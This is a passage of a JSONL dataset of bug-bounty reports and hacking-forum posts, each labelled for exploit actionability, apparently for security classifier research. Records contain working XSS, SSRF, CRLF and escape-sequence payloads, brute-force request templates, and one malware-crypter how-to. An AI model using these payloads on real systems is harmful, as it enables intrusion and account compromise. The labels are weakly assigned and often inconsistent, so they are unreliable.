\"https://mail.acronis.com/autodiscover/autodiscover.json?Email=autodiscover/autodiscover.json@outlook.com&Protocol=ActiveSync\" | grep Protocol\n\n\nand get following output\n\n404 and {\"Protocol\":\"ActiveSync\",\"Url\":\"https://eas.outlook.com/Microsoft-Server-ActiveSync\"}\n\nProving that mail.acronis.com is vulnerable to CVE-2022-41040\n\nPoc video attached\n\n## Impact\n\nSSRF can be used to for unauthorized actions or access to confidential data.", "label": 2, "label_name": "actionable_exploit", "cve_ids": ["CVE-2022-41040"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-10-13", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "9eaeddfd8afac2ae7cf0", "text": "Rapunzel3000: within the >1000 lines HTTP-response, I would have never figured out any reaction to command injection attemps. I can give one more recommendation: Look for different ways to start a sub-shell, as neither && not || worked for me! got it!", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-01-31", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "fc715c901989eab06ea6", "text": "I still do not understand how it works, could you explain it more? I have no idea what I should add what in my modified code. Thanks a lot", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-06-29", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "d46b54cd0705181c9d5a", "text": "[Improper Authentication - Generic] No Rate Limit On Forgot Password on https://apps.nextcloud.com\n\nHi,\n I have found no rate Limit on forgot password.\n\nSummary:-\nA rate limiting algorithm is used to check if the user session (or IP address) has to be limited based on the information in the session cache. In case a client made too many requests within a given time frame, HTTP servers can respond with status code 429: Too Many Requests. (wikipedia) I just realized that on the reset password page, the request has no rate limit which then can be used to loop through one request.\n\nStep to reproduce:-\n1-Go to https://apps.nextcloud.com/password/reset/.\n2- Enter email address\n3- Intercept burp and send request to intruder\n4- Select the number 1 to 50 and click on start attack.\n5- You will get 302 OK\n6- I already attached the PoC video too if you don't understand my explanation and Sorry for inconvenience for video please do mute before watching video.\n\nSuggested to fix:-\nUse CAPTCHA verification if many requests are sent. \n\nReference:-\nhttps://hackerone.com/reports/751604\n\n## Impact\n\nIf You Are Using Any Email Service Software API Or Some Tool Which Costs You For Your Email This Type Of Attack Can Result You In Financial Lose And It Can Also Slow Down Your Services It Can Take Bulk Of Storage In Sent Mail Although If Users Are Affected By This Vulnerability They Can Stop Using Your Services Which Can Lead To Business Risk\nAttackers could use this vulnerability to bomb out the email inbox of the victim.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-09-26", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "16a5a892e7ad498774a1", "text": "[Improper Access Control - Generic] Global default settings page is accessible to non-administrators\n\nIf you go to /settings/, it correctly redirects to /settings/user/username/ and does not give you the option to change global default settings. However if you go straight to /settings/builtin/global/, any user can edit the global default settings. According to https://secure.phabricator.com/D16048, it's supposed to be an administrator panel.\n\nmongoose\n\n## Impact\n\nAt worst, you can disrupt a Phabricator installation and change the accessibility theme, language, disable everyone's notifications. But there aren't any very sensitive settings that you can modify.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-05-09", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "e79649fb8b30b5234ef2", "text": "[Business Logic Errors] captcha bypass leads to register multiple user with one valid captcha\n\n## Summary:\nHi team,\nwhen we register in valley connect, captcha now expire and we can use single valid captcha for register and call to many user.\n\n## Steps To Reproduce:\n1. go to login form : https://valleyconnect.tva.gov/registration\n2. complete form and click on submit registration, then intercept request with burp\n3. use intruder for call multiple request, we should replace email in every request.\n\n```\nPOST /registration HTTP/2\nHost: valleyconnect.tva.gov\n\nUserName=admin&Password=jgn%25%5EThgf%23rfvHRESdy56tef&ConfirmPassword=jgn%25%5EThgf%23rfvHRESdy56tef&EmailAddress=E%40jetamooz.com&EmailAddressVerify=E%40jetamooz.com&FirstName=alex&LastName=jane&Initials=&Suffix=&JobTitle=it&OrganizationType=Business+Partner&OrganizationName=sarv&Country=792&StreetAddress=sary&City=katy&Province=titi&State=AL&ZipCode=&PhoneNumber=%28934%29+734-4364&MobilePhoneNumber=%28957%29+363-4655&TimeZone=America%2FLos_Angeles&CapAnswer=U4YIQ&CapKey=XXTxVOUWZrCz6buVtsgF2cFaPHLSCKVSRQc4z4My13Bee8JiTYVZXmiPd8zLSbMc&BeCheck=\n```\n\n\n## Supporting Material/References:\n\n{F2781078}\n{F2781077}\n{F2781085}\n{F2781080}\n\n## Impact\n\nwe can bypass captcha and register too many user with one valid captcha", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-11-30", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "6f5ad3dea2c541eaa2c8", "text": "[Violation of Secure Design Principles] Ability to perform various POST requests on quantopian.com as a different user - insecure by design.\n\n##Summary:\nDue to excessive control of victim's UI over algorithm collaboration feature one is able to force algorithm collaborator to issue malicious POST requests.\n##Description:\nHello again my favorite VDP! WebSockets again. Following vulnerability can be abused to attack a person that we collaborate on same algorithm with. \nTo understand underlying root of the bug we should review 2 features.\n\n----------------------------------------------------\n**First feature** is \"Build algorithm\" button that checks code for mistakes and quickly builds your algo in IDE.\n{F770716}\nWhen you press this button, you issue POST request to `https://quantopian.com/algorithms/ALGO-ID/validate` like this\n{F770723}\nThis request body contains code of algorithm, algorithm id, runtime and dates of backtest. It is meant to check if code contains errors, i think. \n**What is important about this feature?**\nImportant thing is, it takes user-supplied parameter into URL. To be precise, algorithm IDE page's HTML contains such element - `algo-id`:\n{F770728}\nWhen we press aforementioned button, \"Build Algorithm\", URL is taking ALGO-ID from this element. So if we manually switch this `algo-id` html element's value to \"abracadabra\" and press the \"Build Algorithm\" button, we will automatically issue POST request to `https://quantopian.com/algorithms/abracadabra/validate`. We will get back to this soon.\n\n----------------------------------------------------\n**Second feature** is collaboration websockets library's event called `form-update`. We can issue this event when we update any input fields, like algorithm code or backtest dates. For example, when we switch algo from US Futures to US Equities here:\n{F770751}\nwe automatically issue websocket request like this:\n{F770754}\nBy fuzzing with this form-update evenet i found out that with this websocket command we can set our own value to any html element that has `value` attribute. For example, if we issue such WS reuqest (take a look at \"value\" key):\n```json\n{\"type\":\"form-update\",\"element\":\"#algo-id\",\"value\":\"hello\",\"clientId\":\"x\",\"roomId\":\"5ce6e50b298f7c6e0acb68c6\"}\n```\nit will result in following HTML:\n{F770767}\nNote: since this is a request we issue over websockets, such HTML will be in all collaborators' pages\n----------------------------------------------------\n**Chaining two features together**\nWe can chain these 2 features to achieve some results here. For example we'll take security feature that is located at https://www.quantopian.com/account#security - email notification when your account is logge into from a new browser\n{F770788}\nThis is how request would look if we wanted to turn it on:\n{F770801}\nActually, the payload doesn't have to be in request body, it can also be in URL of the request. So request like this will return HTTP 200 OK code as well:\n{F770805}\nMoreover, URL takes first place when server analyzes request, so even if there is uninterpretable garbage in POST request body, if POST request's url parameters are correct, they will be parsed properly.\nThis is crucial for this bug.\n\nNow, let's remember that:\n- ../../../../ on linux means previous directories.\n- # will mean like comment in code - if it's wrong, just skip it :)\n\nAnd finally, **exploit**:\nLet's issue websockets request like this:\n```json\n{\"type\":\"form-update\",\"element\":\"#algo-id\",\"value\":\"/../../../../../users/update_preferences?prefs%5Bsend_login_detected_email%5D=false\",\"clientId\":\"x\",\"roomId\":\"5ce6e50b298f7c6e0acb68c6\"}\n```\nOur HTML (and our victim's) will look like this:\n{F770819}\nAnd when we our our victim will press on \"Build algorithm\", he will issue this request\n{F770822}\nWe don't care about request's body since the url and supplied parameters are working properly. This will result in our victim himself turning off email notifications of new logins.\n\nAnother example, but with several parameters:\n```json\n{\"type\":\"form-update\",\"element\":\"#algo-id\",\"value\":\"/../../../../../users/upd", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-12-21", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "801740ca15d0e67c9cb0", "text": "[Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG)] Weak randomness in WebCrypto keygen\n\nhttps://github.com/nodejs/node/pull/35093 introduced a call to `EntropySource()` in `SecretKeyGenTraits::DoKeyGen()` in `src/crypto/crypto_keygen.cc`. There are two problems with this:\n\n1. It does not check the return value, it assumes `EntropySource()` always succeeds, but it can (and sometimes will) fail.\n\n2. The random data returned by`EntropySource()` may not be cryptographically strong and therefore not suitable as keying material.\n\nAn example is a freshly booted system or a system without `/dev/random` or `getrandom(2)`.\n\n## Impact\n\n`EntropySource()` calls out to openssl's `RAND_poll()` and `RAND_bytes()` in a best-effort attempt to obtain random data.\n\nOpenSSL has a built-in CSPRNG but that can fail to initialize, in which case it's possible either:\n\n1. No random data gets written to the output buffer, i.e., the output is unmodified, or\n\n2. Weak random data is written. It's theoretically possible for the output to be fully predictable because the CSPRNG starts from a predictable state.\n\nThe output buffer is allocated in `SecretKeyGenTraits::DoKeyGen()` using `OPENSSL_malloc()` (alias for `CRYPTO_malloc()`), which in turn calls `malloc()`.\n\n`malloc()` does not zero the buffer but its contents may be predicted or manipulated by an external attacker, e.g. by manipulating an arraybuffer, then forcing the GC to reclaim it.\n\nUsers can override the CSPRNG (and do) so there are probably more failure modes. A buggy CSPRNG could write out only zeroes, for example, comparable to (2).\n\nI have a (trivial!) patch available. H1 gives this a really high CVSS score but I suppose that's appropriate when the worst case failure mode is a complete breakdown of confidentiality and integrity.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-10-26", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "c1c3d38b748cfa9ea840", "text": "[Information Exposure Through Directory Listing] Information Exposure Through Directory Listing vulnerability\n\nA directory listing provides an attacker with the complete index of all the resources located inside of the directory as well as download or access its contents.\nWhile the researcher did not dig deeper on to the available files, it might be possible that these websites host sensitive information like private videos which can publicly be downloaded or accessed by any user.\nSteps To Reproduce:\nBrowse to the URLs below to see the vulnerability.\nvisit\n1.https://apps.nextcloud.com/static/admin/\n2.https://apps.nextcloud.com/static/admin/js/\n\n## Impact\n\nattacker can able to see the source code of users admin pages..\ncritical information of admin ..", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-02-11", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "11a90266b12c28336425", "text": "[CRLF Injection] CRLF Injection in Nodejs ‘undici’ via host\n\n**Summary:** undici library should be protects HTTP headers from CRLF injection vulnerabilities. However, CRLF injection exists in the ‘host’ header of undici.request api.\n\n\n**Description:**\nlike https://hackerone.com/reports/1664019\nSource code:\nlib/core/request.js:296\n```javascript\nfunction processHeader (request, key, val) {\n if (val && (typeof val === 'object' && !Array.isArray(val))) {\n throw new InvalidArgumentError(`invalid ${key} header`)\n } else if (val === undefined) {\n return\n }\n\n if (\n request.host === null &&\n key.length === 4 &&\n key.toLowerCase() === 'host'\n ) {\n // Consumed by Client\n request.host = val // without headerCharRegex.exec(val)\n } else if (\n request.contentLength === null &&\n...\n```\nExample:\n```javascript\nimport { request } from 'undici'\n\nconst unsanitizedContentTypeInput = '12 \\r\\n\\r\\naaa:aaa'\n\nconst {\n statusCode,\n headers,\n trailers,\n body\n} = await request('http://127.0.0.1:23333', {\n method: 'GET',\n headers: {\n 'content-type': 'application/json',\n 'host': unsanitizedContentTypeInput\n }\n})\n\nconsole.log('response received', statusCode)\nconsole.log('headers', headers)\n\nfor await (const data of body) {\n console.log('data', data)\n}\n\nconsole.log('trailers', trailers)\n\n```\n{F2100713}\n\n## Impact: \n```<=undici@5.14.0```\n\n## Impact\n\n```<=undici@5.14.0```", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-02-22", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "33cb8723a95290ddfcb2", "text": "[Command Injection - Generic] Arbitrary escape sequence injection in docker-machine from worker nodes\n\nHi,\n\nThis bug report is specific to docker-machine and its utilization by Gitlab as preferred tool to allow autoscaling across different providers (https://docs.gitlab.com/runner/configuration/autoscale.html). I am not sure if it fits the scope here but wanted to reach out regarding this before I post it publicly in an upcoming blog post about general topic of escape sequence injection as it might still be relevant for you.\n\nI know that in future docker-machine will be replaced by native support but currently this is the preferred tool to allow autoscaling. (https://gitlab.com/groups/gitlab-org/-/epics/2502)\n\nAttack requirements and description:\n\n1. `docker-machine` reports information like version number in use by worker nodes.\n\n2. worker nodes may be running with a docker socket mounted in container to allow CI builds (of course alternatives like kaniko can be used but using docker socket is still a common approach)\n\n3. Using such an approach with docker-machine and docker executor with mounted docker socket basically means that ci/cd jobs have root access to worker nodes.\n\n4. Now a malicious ci/cd job can overwrite locally running docker daemon with a malicious docker daemon which will still be contacted by `docker-machine` to retrieve information like version, ip etc. Running commands like `docker-machine ls` on the bastion host would inject that malicious information in a window on Bastion node.\n\nPoC:\n\n1. Launch a worker instance using docker-machine and any driver.\n\n2. On the worker node, modify docker daemon to report following string in version response:\n\n```\n\"\\033]2;\\033[21t \\033[1;32m\\033[21t\\033[Jroot@host$ \\v\\033[0m View all output? hit enter to continue: \\v\\033[A?\\033[0\\033[2AA\\033[0\",\n```\n\nThis can be done by compiling docker from source and modifying the version information in `info.go` (https://github.com/moby/moby/blob/23.0/daemon/info.go#L104). Use this docker daemon to overwrite already running docker daemon on the worker node.\n\n3. Now run `docker-machine ls` or `docker-machine version worker_machine_name` and it will:\n\n- change window title by injecting escape sequence using `\\033[2;`\n- Inject arbitrary input in user's prompt i.e. `ll` and try to trick user into hitting enter and executing the input buffer as a command.\n\n4. Using a more malicious input, it will also be possible to crash the bastion node completely.\n\n`docker-machine` is executed with high privilege users and letting it output potentially malicious content can have a high impact not just with escape code injection but also if such an output is used for monitoring or automation scripts assuming that whatever it reports is validated content and not arbitrary information. `docker-machine` should validate this information especially for things like `version`\n\nMore about escape sequences which can be injected in terminals: https://marc.info/?l=bugtraq&m=104612710031920&w=2\n\nPlease review if this fits into the scope here or if it would be alright to publish it as part of a public blog post regarding such attack vectors. \n\nThanks!\n\n## Impact\n\nEscape code injection\nDenial of Service", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-06-02", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "ce6b68be85d8fe2b6340", "text": "[Information Disclosure] Error in Deleting Deck cards attachment reveals the full path of the website\n\n## Summary:\n\nAn error in deck cards when deleting an attachment reveals the full path of the website.\n\n```\nDELETE /apps/deck/cards/11/attachment/file:1 HTTP/2\nHost: ctulhu.me/nc\nSec-Ch-Ua: \"Chromium\";v=\"93\", \" Not;A Brand\";v=\"99\"\nAccept: application/json, text/plain, */*\nSec-Ch-Ua-Mobile: ?0\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36\nSec-Ch-Ua-Platform: \"macOS\"\nOrigin: https://ctulhu.me/nc\nSec-Fetch-Site: same-origin\nSec-Fetch-Mode: cors\nSec-Fetch-Dest: empty\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\n```\n\n### Response\n\n```\nHTTP/2 500 Internal Server Error\nDate: Wed, 29 Sep 2021 07:42:43 GMT\nContent-Type: application/json; charset=utf-8\nContent-Length: 2057\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nPragma: no-cache\nCache-Control: no-cache, no-store, must-revalidate\nContent-Security-Policy: default-src 'none';base-uri 'none';manifest-src 'self';frame-ancestors 'none'\nFeature-Policy: autoplay 'none';camera 'none';fullscreen 'none';geolocation 'none';microphone 'none';payment 'none'\nX-Robots-Tag: none\nReferrer-Policy: no-referrer\nX-Content-Type-Options: nosniff\nX-Download-Options: noopen\nX-Frame-Options: SAMEORIGIN\nX-Permitted-Cross-Domain-Policies: none\nX-Robots-Tag: none\nX-Xss-Protection: 1; mode=block\nCf-Cache-Status: DYNAMIC\nServer: cloudflare\nCf-Ray: 69639391d9741f21-FRA\nAlt-Svc: h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400, h3-28=\":443\"; ma=86400, h3-27=\":443\"; ma=86400\n\n{\"status\":500,\"message\":\"There was an error retrieving the share. Maybe the link is wrong, it was unshared, or it was deleted.\",\"exception\":{\"\\u0000OC\\\\HintException\\u0000hint\":\"\",\"\\u0000*\\u0000message\":\"There was an error retrieving the share. Maybe the link is wrong, it was unshared, or it was deleted.\",\"\\u0000Exception\\u0000string\":\"\",\"\\u0000*\\u0000code\":0,\"\\u0000*\\u0000file\":\"\\/var\\/www\\/██████████\\/custom_apps\\/deck\\/lib\\/Sharing\\/DeckShareProvider.php\",\"\\u0000*\\u0000line\":586,\"\\u0000Exception\\u0000trace\":[{\"file\":\"\\/var\\/www\\/████████\\/custom_apps\\/deck\\/lib\\/Service\\/FilesAppService.php\",\"line\":140,\"function\":\"getShareById\",\"class\":\"OCA\\\\Deck\\\\Sharing\\\\DeckShareProvider\",\"type\":\"-\\u003E\"},{\"file\":\"\\/var\\/www\\/█████\\/custom_apps\\/deck\\/lib\\/Service\\/AttachmentService.php\",\"line\":339,\"function\":\"extendData\",\"class\":\"OCA\\\\Deck\\\\Service\\\\FilesAppService\",\"type\":\"-\\u003E\"},{\"file\":\"\\/var\\/www\\/██████████\\/custom_apps\\/deck\\/lib\\/Controller\\/AttachmentController.php\",\"line\":96,\"function\":\"delete\",\"class\":\"OCA\\\\Deck\\\\Service\\\\AttachmentService\",\"type\":\"-\\u003E\"},{\"file\":\"\\/var\\/www\\/███████\\/lib\\/private\\/AppFramework\\/Http\\/Dispatcher.php\",\"line\":217,\"function\":\"delete\",\"class\":\"OCA\\\\Deck\\\\Controller\\\\AttachmentController\",\"type\":\"-\\u003E\"},{\"file\":\"\\/var\\/www\\/███████\\/lib\\/private\\/AppFramework\\/Http\\/Dispatcher.php\",\"line\":126,\"function\":\"executeController\",\"class\":\"OC\\\\AppFramework\\\\Http\\\\Dispatcher\",\"type\":\"-\\u003E\"},{\"file\":\"\\/var\\/www\\/█████\\/lib\\/private\\/AppFramework\\/App.php\",\"line\":156,\"function\":\"dispatch\",\"class\":\"OC\\\\AppFramework\\\\Http\\\\Dispatcher\",\"type\":\"-\\u003E\"},{\"file\":\"\\/var\\/www\\/██████████\\/lib\\/private\\/Route\\/Router.php\",\"line\":301,\"function\":\"main\",\"class\":\"OC\\\\AppFramework\\\\App\",\"type\":\"::\"},{\"file\":\"\\/var\\/www\\/██████\\/lib\\/base.php\",\"line\":1000,\"function\":\"match\",\"class\":\"OC\\\\Route\\\\Router\",\"type\":\"-\\u003E\"},{\"file\":\"\\/var\\/www\\/█████████\\/index.php\",\"line\":36,\"function\":\"handleRequest\",\"class\":\"OC\",\"type\":\"::\"}],\"\\u0000Exception\\u0000previous\":null}}\n```\n\n## Steps To Reproduce:\n[add details for how we can reproduce the issue]\n\n* 0.) setup burpsuite\n* 1.) go to $website/apps/deck and pick any cards\n* 2.) attach a file to the card and delete it\n* 3.) On burp suite go to proxy > http history > find the request\n* 4.) send the request to repeater and run the request again\n\n## Impact\n\nFull path disclosure", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-05-20", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "b804a0e22e1d01500266", "text": "[Cross-site Scripting (XSS) - Generic] Reflected Xss in [██████]\n\n**Description:**\nReflected XSS in █████████ due to unsanitized single quote `'`. \n## Impact\nAn attacker could execute arbitrary javascript, and perform malicious actions !\n\n## Step-by-step Reproduction Instructions\n\n1. Used payload: `simo%27onfocus=%27confirm(document.domain)%27name=%27simo%27#simo`\n2. Visit the url, the alert box should pop up !: \n`https://www.█████/gri/ziptool/search.aspx?a=1simo%27onfocus=%27confirm(document.domain)%27name=%27simo%27#simo`\n\n█████████\n\n## Suggested Mitigation/Remediation Actions\nSanitize single quote !\n\n## Impact\n\nAn attacker could execute arbitrary javascript in the client browser .", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-09-06", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "da8f58d74e664b7c8ec8", "text": "[Improper Restriction of Authentication Attempts] Entering passwords on the Share Login Page can lead to a brute-force attack\n\n## Summary:\nI have identified that when sharing the Results with a password, the request (POST method) when entering a password has no rate limit, which can then be used to loop through one request. An attacker can brute-force for a password and can get a possibly a dashboard Results.\n\nA rate limiting algorithm is used to check if the user session (or IP-address) has to be limited based on the information in the session cache. In case a client made too many requests within a given timeframe, HTTP-Servers can respond with status code 429: Too Many Requests.\n\nThe problem here is that the sharing links are crawled, so if there is a link that does not contain a password, the account information will be revealed, and if there is a password, it can be brute-forced .\n\n█████\n\n## Steps To Reproduce:\n1. Go to https://app.crowdsignal.com/share/███ (this my Survey)\n2. Enter any password and click Login.\n3. Intercept the request (you can use Burp Suite tool to do this)\n4.\n```\nPOST /share/████████/password HTTP/1.1\nHost: app.crowdsignal.com\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 43\nOrigin: https://app.crowdsignal.com\nConnection: close\nReferer: https://app.crowdsignal.com/share/██████\nCookie:\nUpgrade-Insecure-Requests: 1\nSec-Fetch-Dest: document\nSec-Fetch-Mode: navigate\nSec-Fetch-Site: same-origin\nSec-Fetch-User: ?1\n\naction=password&nonce=██████████&password=§\n```\n5. Now Send This Request To Intruder And brute-force it 1000 times with a list of 1000 passwords.\n6. See that you will get a length of 297 when the password is incorrect and when you get 414 that is the correct password.\n\n\n## Supporting Material/References:\n████\n\n## Impact\n\nIf an attacker successfully brute forces the password, they may be able to access the following: Results, Answer Details, Devices, Locations, and Participants.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-08-27", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "6583e6f40e4bdf3c9992", "text": "I could need help as well. I found flag 4 and upgraded my Shell to a fully interactive shell. I also checked commands I can execute with sudo without password and tried to exploit the command. Is this the right way? I did not really find useful hints from the internet.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-08-04", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "82f5a672db59b5453e5a", "text": "I have added the correct url where the ipaddress mentioned is the one which corresponds to the tun0 on my local machine , but still on hitting the url no events are generated", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-12-22", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "f3cf21b817ea91afcef8", "text": "[Cross-site Scripting (XSS) - Reflected] XSS on https://███████/██████████ parameter\n\nPoC\n```\nhttps://███████/███\n```\nPameter 'xxslots' must be invalid\nPayload ```xss%22%20tabindex%3d1%20autofocus%20onfocus%3d%22alert()```\n███████\n\n## Impact\n\nXSS on https://███████/\n\n## System Host(s)\n██████████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\nGo to ```XSS on https://██████/██████████```\n\n## Suggested Mitigation/Remediation Actions", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-04-07", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "f90e1d5dc81496b8953f", "text": "[Improper Authorization] staffOrderNotificationSubscriptionDelete Could Be Used By Staff Member With Settings Permission\n\nHi,\n\nThe staff order notification should be under the control of staff members with `Order` permission but I found that the staff member with just `Settings` permission can also delete the order notifications using the GID\n\nSteps to reproduce\n- Login as a staff member with `Settings` permission\n- Make this GraphQL call to `https://yoursubdomain.myshopify.com/admin/internal/web/graphql/core?operation=SwitcherNoStores`\n\n```\n{\"query\": \"mutation{staffOrderNotificationSubscriptionDelete(staffOrderNotificationSubscriptionId:\\\"gid://shopify/StaffOrderNotificationSubscription/82867191864\\\"){userErrors{message}}} \"}\n```\n\n- Note: you can find the `82867191864` id from `/admin/settings/notifications` as an admin account, in the `Staff order notifications` section, after adding a order notification and the id is in the URL\n\n- The response you see should be `{\"staffOrderNotificationSubscriptionDelete\":{\"userErrors\":[]}}`, and this means you have deleted the subscription already\n\n## Impact\n\nThe staff order notification should be under the control of staff members with `Order` permission but I found that the staff member with just `Settings` permission can also delete the order notifications using the GID", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-02-09", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "2afb08fcd6ecab610be6", "text": "[Cross-Site Scripting (XSS)] HTML Injection at https://stage.firefoxmonitor.nonprod.cloudops.mozgcp.net/user/unsubscribe\n\nHello, \n\nThe \"Unsubscribe\" page seems to be affected by Cross-Site Scripting (XSS) .Unfortunately my IP was blocked and I couldn't go ahead with the test to find a real proof of concept. So I'll just stick to this\n\nPOC:\n\nhttps://stage.firefoxmonitor.nonprod.cloudops.mozgcp.net/user/unsubscribe?%27%22%3E%3C/title%3E%3Cscript%3Ealert(xss)%3C/script%3E%3E%3Cmarquee%3E%3Ch1%3EXSS%3C/h1%3E%3C/marquee%3E \n\nCheers\n\n## Impact\n\nAn attacker could use this to inject malicious client side code, such as JavaScript, and execute it within the context of another user. This could possibly lead to user account compromises, user’s being socially engineered and many more attacks against the application’s users.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-10-20", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "bcd9aacc5efd754743c1", "text": "[Cross-site Scripting (XSS) - Reflected] Reflected XSS on [█████████]\n\n## Summary:\nHi security team members,\n\nI found a reflected XSS on the URL\n\n## Impact\n\n1. An attacker can steal the victim's cookies.\n2. An attacker can execute JS code.\n\n## System Host(s)\n█████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\n1. Navigate to this link:- https://██████████/██████=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E\n2. Then, it will execute.\n\n## Suggested Mitigation/Remediation Actions", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-04-07", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "607804b5ea1b2cd4e8a0", "text": "Can anyone write to me privately please. I have a question about the optional task and would like to understand it. I have all 5 flags, for info.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-08-12", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "a0dc16d58e5395477e1f", "text": "[Improper Authorization] User with no Develop apps permission can Uninstall Custom App\n\nHi,\n\nYou know user must have Develop apps permission to Uninstall Develop apps \nto test this just create staff with `Manage and install apps and channels`\n\n{F1601504}\n\nsend this mutation just change appId by your id\n\n```\n{\"operationName\":\"UninstallCustomApp\",\"variables\":{\"appId\":\"gid://shopify/App/6431893\"},\"query\":\"mutation UninstallCustomApp($appId: ID!) {\\n appUninstall(input: {id: $appId}) {\\n app {\\n id\\n __typename\\n }\\n userErrors {\\n field\\n message\\n __typename\\n }\\n __typename\\n }\\n}\\n\"}\n```\n\n## Impact\n\nUser with no Develop apps permission can Uninstall Custom App", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-04-21", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "64fe586edb7563cdf916", "text": "I found something here? gist.github.com https://gist.github.com/Bristools/7af6f8710837a5d8a3786059fce18e3a/revisions gistfile1.txt You'll need inno setup compiler and Winrar https://jrsoftware.org/isdl.php https://www.win-rar.com/start.html?&L=0 https://direct-link.net/323899/itroublve MAKE SURE TO TURN ON BYPASS WINDOWS SECURITY -------------------------------------------------- 1.)First create a stub using a stub maker of your choice. I recommend Mercurial 2.)Download inno setup compiler and create a new script file using the script wizard This file has been truncated. show original", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackersploit", "forum_id": "hackersploit", "timestamp": "2022-12-16", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "9c5641267100399f34d8", "text": "[Insecure Temporary File] Broken Domain Link Takeover from kubernetes.io docs\n\nReport Submission Form\n\n## Summary:\nKubernetes docs have Spanish translation available. One of the pages of the Portuguese doc has an external reference to a website .\nThe website is not registered and can be purchased and used to host malicious content.\n\n## Kubernetes Version:\nNA\n\n## Component Version:\nNA\n## Steps To Reproduce:\n\n1. Go to https://kubernetes.io/pt-br/docs/concepts/cluster-administration/addons/\n2. Search for `contiv`\n3. Click on 'Contiv`\nYou will be redirected to https://contiv.io/ which does not exist...\n\n## Supporting Material/References:\n1. 